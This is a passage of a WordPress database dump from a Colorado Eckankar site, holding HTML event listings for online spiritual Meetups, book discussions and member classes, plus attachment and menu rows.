online spiritual discussion as we find joy and gain insight into our own lives. Seekers will discuss the challenges and spiritual guidance that we experience in our daily lives. Hear others share insights they gained through day dreams, night dreams and intuition. All are welcome to share ideas, ask questions or listen while others speak of their own spiritual journey.</span></p>\r\n<p><span style=\"font-size: 12pt;\">This event is sponsored by ECKANKAR, the Path of Spiritual Freedom, as a community service for people of all faiths and beliefs.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The Spiritual Wisdom Journal titled, “Coping with the Tensions of Living” includes stories from people who are have experienced miracles as they let go of the tension of living and find new insights on how life works. It also contains a spiritual exercise you are welcome to try. This free publication can be viewed or downloaded at: <a href=\"https://www.spiritualwisdomjournal.org/Archives/swj_apr2021.pdf\"><em>Spiritual Wisdom Journal</em></a><br />\r\n</span></p>\r\n<p><span style=\"font-size: 12pt;\">There is never a charge for this Meetup.</span></p>\r\n<p>&nbsp;</p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofGolden/events/277792234/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','MEETUP ONLINE EVENT<br>Coping with the Tensions of Living','','publish','closed','closed','','meetup-online-eventcoping-with-the-tensions-of-living','','','2021-04-26 14:01:41','2021-04-26 20:01:41','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=264650',0,'tribe_events','',0),(264651,2,'2021-04-26 13:42:50','2021-04-26 19:42:50','','eagle-flying-2','','inherit','closed','closed','','eagle-flying-2','','','2021-04-26 13:42:50','2021-04-26 19:42:50','',264650,'https://eckankar-colorado.org/wp-content/uploads/2021/04/eagle-flying-2.jpg',0,'attachment','image/jpeg',0),(264678,2,'2021-04-26 20:16:19','2021-04-27 02:16:19','<p><span style=\"font-size: 18pt; color: #954a00;\">- Are you searching for balance in today’s world?</span></p>\r\n<p><span style=\"font-size: 18pt; color: #954a00; line-height: 0.9;\">- Do you wonder if there is a way to face stressful situations with love rather than fear?</span></p>\r\n<p><span style=\"font-size: 18pt; color: #954a00; line-height: 0.9;\">- Do you have a feeling inside that there is more to life than coping with the challenges of the day?</span></p>\r\n<p><span style=\"font-size: 14pt;\"><strong>Spiritually you can shift from coping with the tensions of living to finding a place of inner peace. It is possible to go within and find the answers to anything you face.</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">It may be difficult to believe but the answer to every problem you face is already within you. This does not mean that problems disappear. Yet, can give you hope that you will find a solution. You are soul created from love. Put in this world to learn and grow in spiritual stamina. Make the shift from looking at life as a series of problems to seeing it as an opportunity to gain spiritual freedom!</span></p>\r\n<p>&nbsp;</p>\r\n<blockquote class=\"bg-blockquote border\" style=\"border-color: #954a00; margin-top: -15px; margin-left: 20px;\">\r\n<p><span style=\"color: #666666;\">“At certain times in your life, things are more up in the air than at other times. When they are, you’re living on the edge. Your nerves are frayed, or sometimes you’re being pushed too fast for what you can do. If you don’t get it done, you wonder, then what? Because you do not know. These are the tensions of living.”</span></p>\r\n<p><span style=\"font-size: 12pt; color: #666666;\">“The Holy Spirit is directing each of our lives. It will lead you, and has led you, into the very life and circumstances that you need- the circumstances which spiritually are very good for you.””</span><br />\r\n<span style=\"font-size: 12pt; color: #666666;\">— Harold Klemp, <em> Spiritual Wisdom Journal</em></span></p>\r\n</blockquote>\r\n<p><span style=\"font-size: 12pt;\">-Quotes by Harold Klemp from the <em>Spiritual Wisdom Journal</em> are referenced below.</span></p>\r\n<p><span style=\"font-size: 12pt;\">All are welcome to join us for this online spiritual discussion as we find joy and gain insight into our own lives. Seekers will discuss the challenges and spiritual guidance that we experience in our daily lives. Hear others share insights they gained through day dreams, night dreams and intuition. All are welcome to share ideas, ask questions or listen while others speak of their own spiritual journey.</span></p>\r\n<p><span style=\"font-size: 12pt;\">This event is sponsored by ECKANKAR, the Path of Spiritual Freedom, as a community service for people of all faiths and beliefs.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The Spiritual Wisdom Journal titled, “Coping with the Tensions of Living” includes stories from people who are have experienced miracles as they let go of the tension of living and find new insights on how life works. It also contains a spiritual exercise you are welcome to try. This free publication can be viewed or downloaded at: <a href=\"https://www.spiritualwisdomjournal.org/Archives/swj_apr2021.pdf\"><em>Spiritual Wisdom Journal</em></a><br />\r\n</span></p>\r\n<p><span style=\"font-size: 12pt;\">There is never a charge for this Meetup.</span></p>\r\n<p>&nbsp;</p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofGolden/events/277792696/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','MEETUP ONLINE EVENT<br>Coping with the Tensions of Living','','publish','closed','closed','','meetup-online-eventcoping-with-the-tensions-of-living-2','','','2021-04-26 20:18:19','2021-04-27 02:18:19','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=264678',0,'tribe_events','',0),(264782,2,'2021-04-28 20:27:40','2021-04-29 02:27:40','<ul>\r\n	<li><span style=\"font-size: 18pt;\"><strong><span style=\"color: #954a00;\">Have you experienced your own divinity?<br />\r\n<br />\r\n</span></strong></span></li>\r\n	<li><span style=\"font-size: 18pt;\"><strong><span style=\"color: #954a00;\">How does creativity relate to divinity?<br />\r\n<br />\r\n</span></strong></span></li>\r\n	<li><span style=\"font-size: 18pt;\"><strong><span style=\"color: #954a00;\">How do you tap into your own creativity?<br />\r\n<br />\r\n</span></strong></span></li>\r\n	<li><span style=\"font-size: 18pt;\"><strong><span style=\"color: #954a00;\">How does divine creativity help you live the life you want?</span></strong></span></li>\r\n</ul>\r\n<p><span style=\"font-size: 16pt;\"><strong><br />\r\nIf you are interested in exploring any of these questions, then this Meetup is for you.</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">We will be using exercises to help you discover your own divine nature. The evening will include contemplation and discussion on how to use the creative force moving through you to create the life you want to live. Our goal is that you will recognize your own divine nature and learn to create the life you want from this place of divinity within.</span></p>\r\n<p>&nbsp;</p>\r\n<blockquote class=\"bg-blockquote border\" style=\"border-color: #954a00; margin-top: -15px; margin-left: 20px;\">\r\n<p><span style=\"color: #666666;\">“As we go about our day, ideas come through on how to solve problems, how to make our work easier, or how to make things better for someone else. These ideas come from the creative imagination which, to state it as simply as possible, is God in expression, manifesting Its creation in this world through our actions. This is God speaking through us. The creative imagination is the element that makes us godlike.”</span><br />\r\n<span style=\"font-size: 12pt; color: #666666;\">— Harold Klemp, <em> The ECK Essentials - </em>p. 9</span></p>\r\n</blockquote>\r\n<p><span style=\"font-size: 12pt;\">This Meetup group, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">To explore a deeper inner connection, check out <a class=\"link\" title=\"www.TheSoundofSoul.org\" href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\">TheSoundofSoul.org</a>.</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">The Zoom link will be provided to those members who RSVP that they are attending.</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">There is never a charge for this Meetup.</span></p>\r\n<p>&nbsp;</p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofDenver/events/277851948/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','MEETUP ONLINE EVENT - 12 Secrets of Spiritual Living:<br> Secrets of Divine Creativity','','publish','closed','closed','','meetup-online-eventtemplate-3','','','2021-04-28 20:36:16','2021-04-29 02:36:16','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=264782',0,'tribe_events','',0),(264797,2,'2021-04-29 17:10:31','2021-04-29 23:10:31','<p>&nbsp;</p>\r\n<blockquote class=\"bg-blockquote border\" style=\"border-color: #954a00; margin-top: -15px; margin-left: 20px;\">\r\n<p><span style=\"color: #666666; font-size: 14pt;\">“The rule of karma determines factors like male or female body, eye-hand coordination, long- or short-term memory retention and desires. In addition our karmic package includes race, ancestry, family, friends, economic and social standing, and much more besides. However what comes of these conditions depends upon the exercise of our free will.”</span><br />\r\n<span style=\"font-size: 12pt; color: #666666;\">— Harold Klemp, <em>The Call of Soul - page 96</em></span></p>\r\n</blockquote>\r\n<p><br />\r\n<span style=\"font-size: 14pt;\"><strong>OPTIONAL</strong> to enrich and deepen your ‘Past Lives and Reincarnation’ Meetup discussion experience ... <br />\r\nOpen... <a class=\"link\" title=\"https://www.eckankar.org/experience/past-lives/\" href=\"https://www.eckankar.org/experience/past-lives/\" target=\"_blank\" rel=\"nofollow noopener ugc\">\'Past Lives and Reincarnation\'</a>... </span></p>\r\n<p style=\"padding-left: 40px;\"><span style=\"font-size: 12pt;\">1. Listen to excerpts of talks by Harold Klemp (at the middle and bottom of page):</span></p>\r\n<p style=\"padding-left: 80px;\"><span style=\"font-size: 12pt;\">...<strong> ‘Ethiopia or Louisiana?\'</strong></span><br />\r\n<span style=\"font-size: 12pt;\">... <strong>\'Dissolve The Walls Between Past, Present, And Future\' </strong></span><br />\r\n<span style=\"font-size: 12pt;\">...<strong> \'Mystery of Soul\'</strong></span></p>\r\n<p style=\"padding-left: 40px;\"><span style=\"font-size: 12pt;\">2. View/study what is written on the page.</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt; padding-left: 40px;\">3. Read the articles at the bottom of the page entitled ...</span></p>\r\n<p style=\"padding-left: 80px;\"><a href=\"https://www.eckankar.org/why-bad-things-happen-to-good-people/\" target=\"_blank\" rel=\"noopener\">... <strong>\'Why Bad Things Happen to Good People\'</strong></a><br />\r\n<a href=\"https://www.eckankar.org/healing-a-broken-trust/\" target=\"_blank\" rel=\"noopener\">... <strong>\'Healing a Broken Trust\'</strong></a><br />\r\n<a href=\"https://www.eckankar.org/the-gift-of-awareness/\" target=\"_blank\" rel=\"noopener\">...<strong> \'The Gift of Awareness\'</strong></a><br />\r\n<a href=\"https://www.eckankar.org/youve-lived-before-and-you-will-live-again/\" target=\"_blank\" rel=\"noopener\">... <strong>\'You Have Lived Before and You Will Live Again</strong></a></p>\r\n<p><span style=\"font-size: 12pt;\">Bring your questions, comments, and experiences to discuss how to expand awareness naturally and explore the unlimited worlds of Soul.</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">This ‘Past Lives and Reincarnation’ Meetup is the fourth of six topics in the \'A JOURNEY LIKE NO OTHER’ series, sponsored by Eckankar - The Path of Spiritual Freedom – in Colorado.</span></p>\r\n<p><span style=\"font-size: 12pt;\">We invite you, and welcome you, to attend any one, or any combination, of the Meetups in the ‘A JOURNEY LIKE NO OTHER’ series.</span></p>\r\n<p>&nbsp;</p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofAurora/events/277858839/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','MEETUP ONLINE EVENT - Past Lives and Reincarnation’ <br> ‘A Journey Like No Other’','','publish','closed','closed','','meetup-online-event-past-lives-and-reincarnation-a-journey-like-no-other','','','2021-05-01 20:21:49','2021-05-02 02:21:49','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=264797',0,'tribe_events','',0),(264842,2,'2021-05-03 14:45:09','2021-05-03 20:45:09','You can see how this popup was set up in our step-by-step guide: https://wppopupmaker.com/guides/auto-opening-announcement-popups/','Example: Auto-opening announcement popup','','publish','closed','closed','','example-auto-opening-announcement-popup-4','','','2021-05-03 14:45:09','2021-05-03 20:45:09','',0,'https://eckankar-colorado.org/?p=264842',0,'popup','',0),(264846,2,'2021-05-03 20:24:28','2021-05-04 02:24:28','You can see how this popup was set up in our step-by-step guide: https://wppopupmaker.com/guides/auto-opening-announcement-popups/','Example: Auto-opening announcement popup','','publish','closed','closed','','example-auto-opening-announcement-popup-5','','','2021-05-03 20:24:28','2021-05-04 02:24:28','',0,'https://eckankar-colorado.org/?p=264846',0,'popup','',0),(264874,2,'2021-05-05 13:43:56','2021-05-05 19:43:56','','fb-icon-email','','inherit','closed','closed','','fb-icon-email','','','2021-05-05 13:43:56','2021-05-05 19:43:56','',0,'https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png',0,'attachment','image/png',0),(264882,0,'2021-05-09 12:16:15','2021-05-09 18:16:15','','','','publish','closed','closed','','264882','','','2021-05-09 12:16:15','2021-05-09 18:16:15','',0,'https://eckankar-colorado.org/nf_sub/264882/',0,'nf_sub','',0),(264889,2,'2021-05-09 13:59:52','2021-05-09 19:59:52','<ul>\r\n	<li><span style=\"font-size: 18pt;\"><strong><span style=\"color: #954a00;\">Have you experienced your own divinity?<br />\r\n<br />\r\n</span></strong></span></li>\r\n	<li><span style=\"font-size: 18pt;\"><strong><span style=\"color: #954a00;\">How does creativity relate to divinity?<br />\r\n<br />\r\n</span></strong></span></li>\r\n	<li><span style=\"font-size: 18pt;\"><strong><span style=\"color: #954a00;\">How do you tap into your own creativity?<br />\r\n<br />\r\n</span></strong></span></li>\r\n	<li><span style=\"font-size: 18pt;\"><strong><span style=\"color: #954a00;\">How does divine creativity help you live the life you want?</span></strong></span></li>\r\n</ul>\r\n<p><span style=\"font-size: 16pt;\"><strong><br />\r\nIf you are interested in exploring any of these questions, then this Meetup is for you.</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">We will be using exercises to help you discover your own divine nature. The evening will include contemplation and discussion on how to use the creative force moving through you to create the life you want to live. Our goal is that you will recognize your own divine nature and learn to create the life you want from this place of divinity within.</span></p>\r\n<p>&nbsp;</p>\r\n<blockquote class=\"bg-blockquote border\" style=\"border-color: #954a00; margin-top: -15px; margin-left: 20px;\">\r\n<p><span style=\"color: #666666;\">“As we go about our day, ideas come through on how to solve problems, how to make our work easier, or how to make things better for someone else. These ideas come from the creative imagination which, to state it as simply as possible, is God in expression, manifesting Its creation in this world through our actions. This is God speaking through us. The creative imagination is the element that makes us godlike.”</span><br />\r\n<span style=\"font-size: 12pt; color: #666666;\">— Harold Klemp, <em> The ECK Essentials - </em>p. 9</span></p>\r\n</blockquote>\r\n<p><span style=\"font-size: 12pt;\">This Meetup group, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">To explore a deeper inner connection, check out <a class=\"link\" title=\"www.TheSoundofSoul.org\" href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\">TheSoundofSoul.org</a>.</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">The Zoom link will be provided to those members who RSVP that they are attending.</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">There is never a charge for this Meetup.</span></p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofDenver/events/277851948/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','MEETUP ONLINE EVENT - 12 Secrets of Spiritual Living:<br> Secrets of Divine Creativity','','publish','closed','closed','','meetup-online-eventtemplate-777','','','2021-05-09 13:59:52','2021-05-09 19:59:52','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=264889',0,'mec-events','',0),(264890,2,'2021-05-09 14:06:20','2021-05-09 20:06:20','<p><span style=\"font-size: 18pt; color: #954a00;\">- Are you searching for balance in today’s world?</span></p>\r\n<p><span style=\"font-size: 18pt; color: #954a00; line-height: 0.9;\">- Do you wonder if there is a way to face stressful situations with love rather than fear?</span></p>\r\n<p><span style=\"font-size: 18pt; color: #954a00; line-height: 0.9;\">- Do you have a feeling inside that there is more to life than coping with the challenges of the day?</span></p>\r\n<p><span style=\"font-size: 14pt;\"><strong>Spiritually you can shift from coping with the tensions of living to finding a place of inner peace. It is possible to go within and find the answers to anything you face.</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">It may be difficult to believe but the answer to every problem you face is already within you. This does not mean that problems disappear. Yet, can give you hope that you will find a solution. You are soul created from love. Put in this world to learn and grow in spiritual stamina. Make the shift from looking at life as a series of problems to seeing it as an opportunity to gain spiritual freedom!</span></p>\r\n<p>&nbsp;</p>\r\n<blockquote class=\"bg-blockquote border\" style=\"border-color: #954a00; margin-top: -15px; margin-left: 20px;\">\r\n<p><span style=\"color: #666666;\">“At certain times in your life, things are more up in the air than at other times. When they are, you’re living on the edge. Your nerves are frayed, or sometimes you’re being pushed too fast for what you can do. If you don’t get it done, you wonder, then what? Because you do not know. These are the tensions of living.”</span></p>\r\n<p><span style=\"font-size: 12pt; color: #666666;\">“The Holy Spirit is directing each of our lives. It will lead you, and has led you, into the very life and circumstances that you need- the circumstances which spiritually are very good for you.””</span><br />\r\n<span style=\"font-size: 12pt; color: #666666;\">— Harold Klemp, <em> Spiritual Wisdom Journal</em></span></p>\r\n</blockquote>\r\n<p><span style=\"font-size: 12pt;\">-Quotes by Harold Klemp from the <em>Spiritual Wisdom Journal</em> are referenced below.</span></p>\r\n<p><span style=\"font-size: 12pt;\">All are welcome to join us for this online spiritual discussion as we find joy and gain insight into our own lives. Seekers will discuss the challenges and spiritual guidance that we experience in our daily lives. Hear others share insights they gained through day dreams, night dreams and intuition. All are welcome to share ideas, ask questions or listen while others speak of their own spiritual journey.</span></p>\r\n<p><span style=\"font-size: 12pt;\">This event is sponsored by ECKANKAR, the Path of Spiritual Freedom, as a community service for people of all faiths and beliefs.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The Spiritual Wisdom Journal titled, “Coping with the Tensions of Living” includes stories from people who are have experienced miracles as they let go of the tension of living and find new insights on how life works. It also contains a spiritual exercise you are welcome to try. This free publication can be viewed or downloaded at: <a href=\"https://www.spiritualwisdomjournal.org/Archives/swj_apr2021.pdf\"><em>Spiritual Wisdom Journal</em></a><br />\r\n</span></p>\r\n<p><span style=\"font-size: 12pt;\">There is never a charge for this Meetup.</span></p>\r\n<p>&nbsp;</p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofGolden/events/277792234/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','MEETUP ONLINE EVENT<br>Coping with the Tensions of Living','','publish','closed','closed','','meetup-online-eventtemplate-266','','','2021-05-09 14:06:20','2021-05-09 20:06:20','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=264890',0,'mec-events','',0),(264891,2,'2021-05-09 14:10:05','2021-05-09 20:10:05','<p><span style=\"font-size: 18pt; color: #954a00;\">- Are you searching for balance in today’s world?</span></p>\r\n<p><span style=\"font-size: 18pt; color: #954a00; line-height: 0.9;\">- Do you wonder if there is a way to face stressful situations with love rather than fear?</span></p>\r\n<p><span style=\"font-size: 18pt; color: #954a00; line-height: 0.9;\">- Do you have a feeling inside that there is more to life than coping with the challenges of the day?</span></p>\r\n<p><span style=\"font-size: 14pt;\"><strong>Spiritually you can shift from coping with the tensions of living to finding a place of inner peace. It is possible to go within and find the answers to anything you face.</strong></span></p>\r\n<p><span style=\"font-size: 14pt;\">It may be difficult to believe but the answer to every problem you face is already within you. This does not mean that problems disappear. Yet, can give you hope that you will find a solution. You are soul created from love. Put in this world to learn and grow in spiritual stamina. Make the shift from looking at life as a series of problems to seeing it as an opportunity to gain spiritual freedom!</span></p>\r\n<p>&nbsp;</p>\r\n<blockquote class=\"bg-blockquote border\" style=\"border-color: #954a00; margin-top: -15px; margin-left: 20px;\">\r\n<p><span style=\"color: #666666; font-size: 14pt;\">“At certain times in your life, things are more up in the air than at other times. When they are, you’re living on the edge. Your nerves are frayed, or sometimes you’re being pushed too fast for what you can do. If you don’t get it done, you wonder, then what? Because you do not know. These are the tensions of living.”</span></p>\r\n<p><span style=\"font-size: 14pt; color: #666666;\">“The Holy Spirit is directing each of our lives. It will lead you, and has led you, into the very life and circumstances that you need- the circumstances which spiritually are very good for you.””</span><br />\r\n<span style=\"font-size: 14pt; color: #666666;\">— Harold Klemp, <em> Spiritual Wisdom Journal</em></span></p>\r\n</blockquote>\r\n<p><span style=\"font-size: 14pt;\">-Quotes by Harold Klemp from the <em>Spiritual Wisdom Journal</em> are referenced below.</span></p>\r\n<p><span style=\"font-size: 14pt;\">All are welcome to join us for this online spiritual discussion as we find joy and gain insight into our own lives. Seekers will discuss the challenges and spiritual guidance that we experience in our daily lives. Hear others share insights they gained through day dreams, night dreams and intuition. All are welcome to share ideas, ask questions or listen while others speak of their own spiritual journey.</span></p>\r\n<p><span style=\"font-size: 14pt;\">This event is sponsored by ECKANKAR, the Path of Spiritual Freedom, as a community service for people of all faiths and beliefs.</span></p>\r\n<p><span style=\"font-size: 14pt;\">The Spiritual Wisdom Journal titled, “Coping with the Tensions of Living” includes stories from people who are have experienced miracles as they let go of the tension of living and find new insights on how life works. It also contains a spiritual exercise you are welcome to try. This free publication can be viewed or downloaded at: <a href=\"https://www.spiritualwisdomjournal.org/Archives/swj_apr2021.pdf\"><em>Spiritual Wisdom Journal</em></a><br />\r\n</span></p>\r\n<p><span style=\"font-size: 14pt;\">There is never a charge for this Meetup.</span></p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofGolden/events/277792696/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','MEETUP ONLINE EVENT<br>\'Coping with the Tensions of Living\'','','publish','closed','closed','','meetup-online-eventtemplate-188','','','2021-05-23 10:24:21','2021-05-23 16:24:21','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=264891',0,'mec-events','',0),(264893,2,'2021-05-09 14:31:44','2021-05-09 20:31:44','<p><span style=\"font-size: 14pt;\"><strong>-This Book Discussion Is Open To The Public-</strong></span></p>\r\n<p><span style=\"font-size: 14pt;\">Harold Klemp’s inspiring and practical approach to spirituality helps many thousands of people worldwide find greater freedom, wisdom, and love in their lives.</span></p>\r\n<p><span style=\"font-size: 14pt;\">His wisdom and heart-opening stories of everyday people having extraordinary experiences tell of a secret truth at work in your life–there is divine purpose and meaning to every experience you have. Every single moment of your life is the handiwork of a higher cause. And you can know what it is. Hint: God’s love is the key, and spiritual freedom is the goal.</span></p>\r\n<p><span style=\"font-size: 14pt;\">Author of more than one hundred books, he continues to write, including many articles and spiritual-study discourses. His books have been translated into more than 18 languages. These transcripts reveal his approach to giving insights, wisdom, and guidance through the stories of people from around the world. Spanning a variety of topics</span></p>\r\n<p><span style=\"font-size: 14pt;\">You can purchase the book at an ECK Center, through many online bookstores like Amazon, or order from the <a href=\"https://www.eckbooks.org/items/-2234-0.html\">ECK Bookstore</a>.</span></p>','Online Book Discussion - The Shariyat-Ki-Sugmad Book 2','','publish','closed','closed','','satsang-class-the-master-2-discourses-848-706','','','2021-05-09 19:50:27','2021-05-10 01:50:27','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=264893',0,'mec-events','',0),(264894,2,'2021-05-09 14:40:43','2021-05-09 20:40:43','<p><strong><span style=\"font-size: 14pt;\">-This Book Discussion Is Open To The Public-</span></strong></p>\r\n<p><span style=\"font-size: 12pt;\"> Harold Klemp\'s inspiring and practical approach to spirituality helps many thousands of people worldwide find greater freedom, wisdom, and love in their lives.</span></p>\r\n<p><span style=\"font-size: 12pt;\">His wisdom and heart-opening stories of everyday people having extraordinary experiences tell of a secret truth at work in your life--there is divine purpose and meaning to every experience you have. Every single moment of your life is the handiwork of a higher cause. And you can know what it is. Hint: God\'s love is the key, and spiritual freedom is the goal.</span></p>\r\n<p><span style=\"font-size: 12pt;\">Author of more than one hundred books, he continues to write, including many articles and spiritual-study discourses. His books have been translated into more than 18 languages. These transcripts reveal his approach to giving insights, wisdom, and guidance through the stories of people from around the world. Spanning a variety of topics</span></p>\r\n<p><span style=\"font-size: 12pt;\">You can purchase the book at an ECK Center, through many online bookstores like Amazon, or order from the <strong><a href=\"https://www.eckbooks.org/items/-2234-0.html\" target=\"_blank\" rel=\"noopener\">ECK Bookstore</a></strong>.</span></p>\r\n<p>&nbsp;</p>','ONLINE Book Discussion - Spiritual Lessons from Living - Mahanta Transcripts, Book 18','','publish','closed','closed','','595','','','2021-05-09 14:40:43','2021-05-09 20:40:43','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=264894',0,'mec-events','',0),(264896,2,'2021-05-09 14:50:04','2021-05-09 20:50:04','<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 14pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 14pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 14pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','ONLINE Member Class - Soul Travel 2','','publish','closed','closed','','satsang-class-the-master-2-discourses-848-244','','','2021-05-09 14:50:04','2021-05-09 20:50:04','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=264896',0,'mec-events','',0),(264898,2,'2021-05-09 20:00:52','2021-05-10 02:00:52','<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 14pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 14pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 14pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','ONLINE Member Class - The ECK Satsang Discourse - Second Series','','publish','closed','closed','','satsang-class-the-master-2-discourses-848-754','','','2021-05-09 20:00:52','2021-05-10 02:00:52','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=264898',0,'mec-events','',0),(264901,2,'2023-10-20 09:43:11','2021-05-10 19:14:20','','Mountain Area Public Calendar','','publish','closed','closed','','264901','','','2023-10-20 09:43:11','2023-10-20 15:43:11','',0,'https://eckankar-colorado.org/?p=264901',6,'nav_menu_item','',0),(264902,2,'2023-10-20 09:43:11','2021-05-10 19:14:20','','Loveland Public Calendar','','publish','closed','closed','','264902','','','2023-10-20 09:43:11','2023-10-20 15:43:11','',0,'https://eckankar-colorado.org/?p=264902',5,'nav_menu_item','',0),(264903,2,'2023-10-20 09:43:11','2021-05-10 19:14:20','','Colorado Springs Public Calendar','','publish','closed','closed','','264903','','','2023-10-20 09:43:11','2023-10-20 15:43:11','',0,'https://eckankar-colorado.org/?p=264903',4,'nav_menu_item','',0),(264957,2,'2021-05-11 09:36:14','2021-05-11 15:36:14','','butterfly-flower-1','','inherit','closed','closed','','butterfly-flower-1','','','2021-05-11 09:36:14','2021-05-11 15:36:14','',0,'https://eckankar-colorado.org/wp-content/uploads/2021/05/butterfly-flower-1.jpg',0,'attachment','image/jpeg',0),(264977,2,'2021-05-11 12:27:19','2021-05-11 18:27:19','<p data-font-family=\"Open Sans\" data-font-weight=\"400\"><span style=\"font-size: 22pt; color: #f28a27;\"><strong>‘When God Calls, Are You Listening?’</strong></span></p>\r\n<p><span style=\"font-size: 18pt;\">Do you want to know how God speaks to you in your everyday life?<br />\r\n</span><span style=\"font-size: 18pt;\">Do you long to tap into the Divine within?<br />\r\n</span><span style=\"font-size: 18pt;\">Have you heard the call of Soul?</span></p>\r\n<p><span style=\"font-size: 14pt;\">If you answered yes to any of these questions, this ECK Light &amp; Sound Service will open the door to the inner guidance and messages from the divine that can assist you in your daily life.</span></p>\r\n<p><span style=\"font-size: 14pt;\">Harold Klemp in his book, <em>The Living Word</em>, says,<br />\r\n<strong>\"Whether we are talking about the inner or outer life, it pays spiritually to open your heart, then your eyes and ears too.\"</strong></span></p>\r\n<p><span style=\"font-size: 14pt;\">Welcome to All. Please come and explore your own answers with open hearts, eyes and ears.</span></p>\r\n<p data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><!-- REGISTRATION SHORTCODE --></p>\r\n<p><a class=\"reg3Button sg-popup-id-264857\" style=\"color: #685454 !important;\" href=\"#\" target=\"_blank\" rel=\"noopener noreferrer\">Register Today!</a></p>','ECK Light & Sound Service - Online Event','','publish','closed','closed','','elss-zoom-online-template-mec-195','','','2021-06-01 07:51:14','2021-06-01 13:51:14','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=264977',0,'mec-events','',0),(265021,0,'2021-05-14 10:02:39','2021-05-14 16:02:39','','','','publish','closed','closed','','265021','','','2021-05-14 10:02:39','2021-05-14 16:02:39','',0,'https://eckankar-colorado.org/nf_sub/265021/',0,'nf_sub','',0),(265023,2,'2021-05-14 14:04:08','2021-05-14 20:04:08','','Central Colorado Public Calendar 2','','publish','closed','closed','','central-colorado-public-calendar-2','','','2021-05-14 14:04:08','2021-05-14 20:04:08','',0,'https://eckankar-colorado.org/?post_type=mec_calendars&#038;p=265023',0,'mec_calendars','',0),(265024,2,'2021-05-14 14:06:11','2021-05-14 